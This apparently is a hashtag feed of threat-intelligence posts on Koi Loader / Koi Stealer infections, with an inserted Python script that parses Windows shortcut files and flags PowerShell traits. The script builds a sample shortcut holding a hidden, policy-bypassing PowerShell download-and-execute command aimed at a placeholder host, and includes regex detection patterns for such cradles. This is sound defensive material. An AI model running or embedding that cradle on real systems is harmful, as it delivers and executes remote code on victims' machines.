#KoiLoader
Screenshot of the web page for the associated blog post.

2025-06-21 (Saturday): #KoiLoader / #KoiStealer infection. #pcap of the infection traffic, associated malware/files, and some of the indicators available at www.malware-traffic-analysis.net/2025/06/21/i...

List of several URLs seen recently that return a zip archive containing a Windows shortcut for Koi Loader / Koi Stealer.

Screenshot of a web browser when downloading one of the zip archives for Koi Loader / Koi Stealer from one of the Google Sites URLs.

Examining the Windows shortcut extracted from the downloaded zip archive. The shortcut runs PowerShell script to infect a host with Koi Loader / Koi Stealer.

Traffic from a Koi Loader / Koi Stealer infection filtered in Wireshark.

2025-05-09 (Friday): #KoiLoader / #KoiStealer activity. Same type of distribution chain and infection characteristics as always.

Example of downloaded zip available at:

- bazaar.abuse.ch/sample/35236...
- tria.ge/250510-a2fw5...
- app.any.run/tasks/3adefb...

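The shortcut-examination step the post above describes (pull the PowerShell command line out of the .lnk extracted from the zip), as an added example that is not part of the original post or the analyst's own tooling. It parses the Shell Link header and StringData section using the field layout from Microsoft's MS-SHLLINK specification and then flags the traits such shortcuts tend to share. The sample shortcut is built in the script; its target path, arguments and URL are invented placeholders, not the Koi Loader sample's.

```python
import re
import struct

# Layout constants from the MS-SHLLINK specification (Shell Link binary file format).
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that starts the target minimised and never activates it


def parse_lnk(data: bytes) -> dict:
    """Parse the ShellLinkHeader and StringData of a .lnk file (ExtraData is ignored)."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("too short to be a Shell Link file")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    show_command, = struct.unpack_from("<I", data, 60)  # ShowCommand sits at offset 60 of the header
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # LinkTargetIDList: IDListSize (uint16) followed by the IDList
        size, = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:  # LinkInfo: LinkInfoSize (uint32) counts itself
        size, = struct.unpack_from("<I", data, off)
        off += size

    def read_string() -> str:
        # StringData entry: CountCharacters (uint16) then that many chars, no terminator
        nonlocal off
        count, = struct.unpack_from("<H", data, off)
        off += 2
        if flags & IS_UNICODE:
            raw, off = data[off:off + 2 * count], off + 2 * count
            return raw.decode("utf-16-le")
        raw, off = data[off:off + count], off + count
        return raw.decode("cp1252", errors="replace")

    info = {"show_command": show_command, "flags": flags}
    # StringData entries appear in this fixed order, each only if its flag bit is set
    for key, bit in (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                     ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                     ("icon_location", HAS_ICON_LOCATION)):
        info[key] = read_string() if flags & bit else None
    return info


def triage(info: dict) -> list:
    """Return human-readable findings for the traits seen in PowerShell-launching shortcuts."""
    cmdline = " ".join(v for v in (info.get("relative_path"), info.get("arguments")) if v)
    low = cmdline.lower()
    findings = []
    if re.search(r"powershell(\.exe)?\b|\bpwsh\b", low):
        findings.append("target launches PowerShell")
    if re.search(r"-(w|win|windowstyle)\s+hidden", low):
        findings.append("command line requests a hidden window")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE (window starts minimised)")
    if re.search(r"-(e|ec|enc|encodedcommand)\s", low):
        findings.append("Base64-encoded command block")
    if re.search(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|downloadfile)\b", low):
        findings.append("download-and-execute cradle")
    return findings


def build_lnk(relative_path: str, working_dir: str, arguments: str, show_command: int) -> bytes:
    """Assemble a minimal Unicode .lnk (no IDList, LinkInfo or ExtraData) so the parser can be exercised offline."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(working_dir) + string_data(arguments)


# Constructed sample: target, arguments and URL are placeholders for this example, not the real
# Koi Loader shortcut. The .invalid TLD never resolves.
SAMPLE_LNK = build_lnk(
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    working_dir=r"C:\Windows\System32",
    arguments=r'-w hidden -nop -ep bypass -c "iwr http://example.invalid/stage.txt -UseBasicParsing | iex"',
    show_command=SW_SHOWMINNOACTIVE,
)

if __name__ == "__main__":
    info = parse_lnk(SAMPLE_LNK)
    print("target   :", info["relative_path"])
    print("arguments:", info["arguments"])
    for finding in triage(info):
        print("  !", finding)
```

For a real extracted shortcut, `parse_lnk(open(path, "rb").read())` gives the same dictionary. Reading the file is preferable to the Explorer Properties dialog, which truncates long Target strings and so can hide the tail of a lengthy PowerShell command line; the parser also exposes ShowCommand, which the dialog only shows as the "Run" drop-down.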

C2 servers use encrypted HTTP POST to steal victim data, masking malicious traffic. Attackers rely on LOLBins & script obfuscation to evade detection.

#Infosec #ThreatHunting #APT #KoiLoader

KoiLoader Reloaded: New Variant Uses LNK Abuse, Script Chains, and PowerShell to Deliver Stealer Payload Learn about the KoiLoader malware and its risks. Discover how KoiLoader facilitates Command and Control operations in cyber attacks.

#KoiLoader reloaded: New variant abuses LNK files, script chains & PowerShell to deliver info-stealers (Raccoon, Vidar). Evades detection via multi-stage execution.

Tactics: securityonline.info/koiloader-re...

31st March – Threat Intelligence Report - Check Point Research For the latest discoveries in cyber research for the week of 31st March, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES New York University (NYU) suffered a cyber-attack wh...

March Threat Intel Recap: #EarthAlux APT targets LATAM, #KoiLoader evolves with LNK abuse, and 24K+ IPs scan PAN-OS VPNs.

Critical trends for defenders: research.checkpoint.com/2025/31st-ma...

Screenshot of the malware-traffic-analysis.net page with analysis of the Koi Loader/Koi Stealer activity from 2025-01-23. The initial EXE kicking off this infection was submitted to VirusTotal on 2024-11-29, but the C2 infrastructure for this infection was still active as of 2025-01-23.

2025-01-23 (Thursday): Windows EXE impersonating an installer submitted to VT on 2024-11-29 leads to #KoiLoader / #KoiStealer infection. A #pcap of the infection traffic, the associated malware/artifacts, and some of the indicators are available at malware-traffic-analysis.net/2025/01/23/i...

Screenshot of the web page hosting the quick post for Koi Loader/Koi Stealer activity listing the IOCs, pcap, and malware/artifacts.

2025-01-21 (Tuesday): Quick post with a #pcap, malware/artifacts and IOCs for #KoiLoader / #KoiStealer activity at malware-traffic-analysis.net/2025/01/21/i...


Latest version of ACCE Release Notes for v2.5.20240418 are live: www.ciphertechsolutions.com/acce-release... #GhostlyStealer #KoiLoader #KoiStealer #PackLab #BroomStick
